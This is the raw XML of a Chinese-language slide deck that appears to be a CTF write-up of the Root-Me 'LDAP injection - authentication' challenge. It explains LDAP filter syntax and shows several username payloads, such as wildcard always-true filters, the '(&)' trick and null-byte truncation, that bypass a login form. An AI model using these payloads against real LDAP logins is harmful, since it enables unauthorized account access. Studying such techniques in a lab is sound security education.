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76" r:id="rId4"/>
    <p:sldId id="278" r:id="rId5"/>
    <p:sldId id="279" r:id="rId6"/>
    <p:sldId id="280" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="283" r:id="rId9"/>
    <p:sldId id="277" r:id="rId10"/>
    <p:sldId id="27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B46"/>
    <a:srgbClr val="00B0F0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74"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="102" y="70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0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2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8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5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6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9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ot-me.org/en/Challenges/Web-Server/LDAP-injection-authentication?lang=e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717634" y="2844276"/>
            <a:ext cx="400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CTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解题报告 </a:t>
            </a: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054181" y="5045692"/>
            <a:ext cx="237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EXP 2019.08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3BE4B6D-A1A3-49E8-8D2C-B4C62C0063D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1982386">
            <a:off x="4036270" y="3805499"/>
            <a:ext cx="422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之三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> · </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - LDAP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5538619" y="3798968"/>
            <a:ext cx="549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欲知后事</a:t>
            </a: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00493"/>
            <a:ext cx="3642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且听下回分解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17789" y="322000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LDAP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cxnSpLocks/>
            <a:stCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727948" y="1785601"/>
            <a:ext cx="0" cy="122158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V="1">
            <a:off x="7727948" y="3007190"/>
            <a:ext cx="4464052" cy="6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803251" y="1970926"/>
            <a:ext cx="3692557" cy="89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Lightweight Directory Access Protocol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轻量级目录访问协议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Aldhabi" panose="01000000000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>树状数据库：保存描述性的、基于属性的详细信息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93144-76D5-4A67-9833-C1F62E3DE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3" y="1362071"/>
            <a:ext cx="7225200" cy="47520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D0F3A3A-19B8-4CC3-830C-8188765F4FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727948" y="1585546"/>
            <a:ext cx="169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定义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AF11B1-8863-442E-A2EE-F5CB797D4816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727948" y="3598241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查询语法（过滤器）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24D4548-EEC6-4C40-819D-2E2B5D81213E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727948" y="3798296"/>
            <a:ext cx="0" cy="1963684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43E23ED-EF2E-40DA-B950-CEB7ECD451B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727948" y="5761980"/>
            <a:ext cx="44640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4E58DBB-9BCB-4F3C-AAC8-512893C98BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7803251" y="4029371"/>
            <a:ext cx="4220792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WHERE A=xxx AND B=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  : 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(&amp;(A=xxx)(B=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/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WHERE A=xxx OR B=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (|(A=xxx)(B=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/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WHERE A LIKE ‘x%’  :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(&amp;(A=x*)(B=*)) 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(&amp;(A=x*)(&amp;))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嵌套  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accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (&amp;(A=xxx)(|(A=xxx)(C=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solid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永真式  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accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (&amp;)  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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(B=*)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173442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748657" y="63979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638475" y="61071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17789" y="322000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LDAP injection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30190-29AB-4192-8CEA-A979A9E15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53" y="1065911"/>
            <a:ext cx="8281293" cy="44233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EAEBD62-060F-4760-B163-58FE6F81D1D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076476" y="5671825"/>
            <a:ext cx="828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(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[username]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userPassword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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[password]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👉 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RootMe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Challenge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5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86108" y="6259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293230" y="61071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7157" y="322000"/>
            <a:ext cx="324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五种注入方式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DCB577-045B-4B11-B9D5-A25ED897E15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292051" y="1595065"/>
            <a:ext cx="1" cy="161494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B5B714-1280-4578-81C5-8721FAE562F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367356" y="1780390"/>
            <a:ext cx="733169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username  :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*)(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=*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password   :  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payload      :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*)(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userPassword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2B0EE-ED37-4575-A198-D1D298A8B861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292051" y="1395010"/>
            <a:ext cx="606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方法一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： 模糊匹配构造永真式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（通配符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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>没被过滤）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563AE8-575E-4B80-A7CF-B90F96C6EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292052" y="3914626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分析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A31F4-F550-4C78-A655-60C9F712D615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292052" y="4114681"/>
            <a:ext cx="0" cy="2117361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D101128-DCC7-4183-94B0-C8415EC2118C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367354" y="4345756"/>
            <a:ext cx="10178317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先计算 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或过滤器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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=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再计算 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与过滤器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】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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(&amp;(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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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 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=*) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是模糊匹配，必定永真，即两个过滤器都是永真，即整个条件式为永真式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此方法不需要知道 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>username  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>即可实现绕过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5403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86108" y="6259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293230" y="61071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7157" y="322000"/>
            <a:ext cx="324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五种注入方式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DCB577-045B-4B11-B9D5-A25ED897E15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292052" y="1595065"/>
            <a:ext cx="0" cy="161494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B5B714-1280-4578-81C5-8721FAE562F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367356" y="1780390"/>
            <a:ext cx="7331692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username  :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>账号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>账号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password   :  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payload      :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>账号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>账号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userPassword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2B0EE-ED37-4575-A198-D1D298A8B861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292052" y="1395010"/>
            <a:ext cx="638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方法二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： 猜正确账号构造永真式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（通配符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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>被过滤）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563AE8-575E-4B80-A7CF-B90F96C6EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292052" y="3914626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分析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A31F4-F550-4C78-A655-60C9F712D615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292052" y="4114681"/>
            <a:ext cx="0" cy="2117361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D101128-DCC7-4183-94B0-C8415EC2118C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367354" y="4345756"/>
            <a:ext cx="101783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与方法一原理相同，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适用于 * 通配符被过滤的情况</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，但需要猜中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>正确的账号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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>可能使用的账号：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/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admin</a:t>
            </a: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administrator</a:t>
            </a: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root</a:t>
            </a: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zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取到的题号，从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rootme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的经验上看，题号经常就是账号）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71087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86108" y="6259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293230" y="61071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7157" y="322000"/>
            <a:ext cx="324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五种注入方式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DCB577-045B-4B11-B9D5-A25ED897E15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292051" y="1595065"/>
            <a:ext cx="1" cy="161494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B5B714-1280-4578-81C5-8721FAE562F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367356" y="1780390"/>
            <a:ext cx="733169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username  :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(&amp;)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password   :  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payload      :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(&amp;)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userPassword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2B0EE-ED37-4575-A198-D1D298A8B861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292051" y="1395010"/>
            <a:ext cx="606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方法三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： 解析器截断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563AE8-575E-4B80-A7CF-B90F96C6EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292052" y="3914626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分析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A31F4-F550-4C78-A655-60C9F712D615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292052" y="4114681"/>
            <a:ext cx="0" cy="2117361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D101128-DCC7-4183-94B0-C8415EC2118C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367354" y="4345756"/>
            <a:ext cx="10178317" cy="180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此 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>只有前半部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> (&amp;(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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(&amp;)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是语法正确的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后半部分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userPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=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/>
              <a:t>)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>因为括号没有配对，是语法错误的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适用于语法校验不严谨的题型，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解析器依然会从左到右执行，直到报错为止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i="1" dirty="0"/>
              <a:t>另此方法同样需要猜中正确的账号使得永真式成立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311086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86108" y="6259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293230" y="61071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7157" y="322000"/>
            <a:ext cx="324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五种注入方式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DCB577-045B-4B11-B9D5-A25ED897E15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292051" y="1595065"/>
            <a:ext cx="1" cy="161494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B5B714-1280-4578-81C5-8721FAE562F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367356" y="1780390"/>
            <a:ext cx="733169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username  :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(&amp;))%00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password   :  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payload      :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(&amp;))%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userPassword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2B0EE-ED37-4575-A198-D1D298A8B861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292051" y="1395010"/>
            <a:ext cx="606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方法四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： 过滤器截断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563AE8-575E-4B80-A7CF-B90F96C6EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292052" y="3914626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分析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A31F4-F550-4C78-A655-60C9F712D615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292052" y="4114681"/>
            <a:ext cx="0" cy="2117361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D101128-DCC7-4183-94B0-C8415EC2118C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
